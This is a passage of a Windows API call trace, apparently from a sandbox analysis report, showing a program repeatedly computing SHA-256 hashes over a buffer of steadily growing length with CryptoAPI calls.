	[0214.546] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.546] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0214.546] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.546] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733ea8
	[0214.546] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733ea8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733ea8, pdwDataLen=0x128ba4) returned 1
	[0214.546] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.546] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.546] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.547] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.547] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0214.547] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.547] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733ed0
	[0214.547] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733ed0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733ed0, pdwDataLen=0x128ba4) returned 1
	[0214.547] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.547] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.547] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.548] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.548] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0214.548] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.548] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733ef8
	[0214.548] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733ef8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733ef8, pdwDataLen=0x128ba4) returned 1
	[0214.548] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.548] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.548] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.548] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.548] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0214.548] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.548] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733f20
	[0214.548] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733f20, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733f20, pdwDataLen=0x128ba4) returned 1
	[0214.549] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.549] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.549] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.549] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.549] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0214.549] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.549] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733f48
	[0214.549] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733f48, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733f48, pdwDataLen=0x128ba4) returned 1
	[0214.549] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.549] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.549] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.550] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.550] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0214.550] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.550] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733f70
	[0214.550] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733f70, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733f70, pdwDataLen=0x128ba4) returned 1
	[0214.550] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.550] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.550] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.550] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.550] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0214.550] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.550] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733f98
	[0214.550] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733f98, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733f98, pdwDataLen=0x128ba4) returned 1
	[0214.550] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.550] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.550] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.551] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.551] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0214.551] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.551] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733fc0
	[0214.551] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733fc0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733fc0, pdwDataLen=0x128ba4) returned 1
	[0214.551] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.551] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.551] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.551] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.551] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0214.551] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.551] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733fe8
	[0214.551] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733fe8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733fe8, pdwDataLen=0x128ba4) returned 1
	[0214.551] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.551] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.551] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.552] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.552] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0214.552] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.552] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734010
	[0214.552] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734010, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734010, pdwDataLen=0x128ba4) returned 1
	[0214.552] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.552] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.552] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.552] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.552] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0214.552] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.552] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734038
	[0214.552] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734038, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734038, pdwDataLen=0x128ba4) returned 1
	[0214.552] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.552] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.553] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.553] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.553] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0214.553] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.553] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734060
	[0214.553] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734060, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734060, pdwDataLen=0x128ba4) returned 1
	[0214.553] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.553] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.553] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.553] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.553] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0214.554] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.554] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734088
	[0214.554] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734088, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734088, pdwDataLen=0x128ba4) returned 1
	[0214.554] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.554] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.554] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.554] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.554] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0214.554] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.554] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27340b0
	[0214.554] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27340b0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27340b0, pdwDataLen=0x128ba4) returned 1
	[0214.554] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.554] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.554] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.555] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.555] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0214.555] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.555] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27340d8
	[0214.555] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27340d8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27340d8, pdwDataLen=0x128ba4) returned 1
	[0214.555] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.555] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.555] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.555] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.555] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0214.555] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.555] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734100
	[0214.555] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734100, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734100, pdwDataLen=0x128ba4) returned 1
	[0214.555] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.555] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.555] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.556] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.556] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0214.556] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.556] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734128
	[0214.556] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734128, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734128, pdwDataLen=0x128ba4) returned 1
	[0214.556] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.556] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.556] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.556] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.556] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0214.556] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.556] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734150
	[0214.556] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734150, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734150, pdwDataLen=0x128ba4) returned 1
	[0214.556] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.556] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.556] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.557] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.557] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0214.557] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.557] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734178
	[0214.557] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734178, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734178, pdwDataLen=0x128ba4) returned 1
	[0214.557] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.557] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.557] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.557] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.557] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0214.558] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.558] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27341a0
	[0214.558] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27341a0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27341a0, pdwDataLen=0x128ba4) returned 1
	[0214.558] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.558] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.558] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.558] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.558] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0214.558] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.558] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27341c8
	[0214.558] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27341c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27341c8, pdwDataLen=0x128ba4) returned 1
	[0214.558] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.558] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.558] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.559] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.559] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0214.559] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.559] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27341f0
	[0214.559] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27341f0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27341f0, pdwDataLen=0x128ba4) returned 1
	[0214.559] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.559] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.559] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.559] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.559] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0214.559] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.559] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734218
	[0214.559] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734218, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734218, pdwDataLen=0x128ba4) returned 1
	[0214.559] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.559] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.559] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.560] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.560] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0214.560] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.560] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734240
	[0214.560] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734240, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734240, pdwDataLen=0x128ba4) returned 1
	[0214.560] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.560] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.560] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.560] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.560] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0214.560] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.560] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734268
	[0214.560] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734268, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734268, pdwDataLen=0x128ba4) returned 1
	[0214.560] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.560] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.560] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.561] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.561] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xfc0, dwFlags=0x0) returned 1
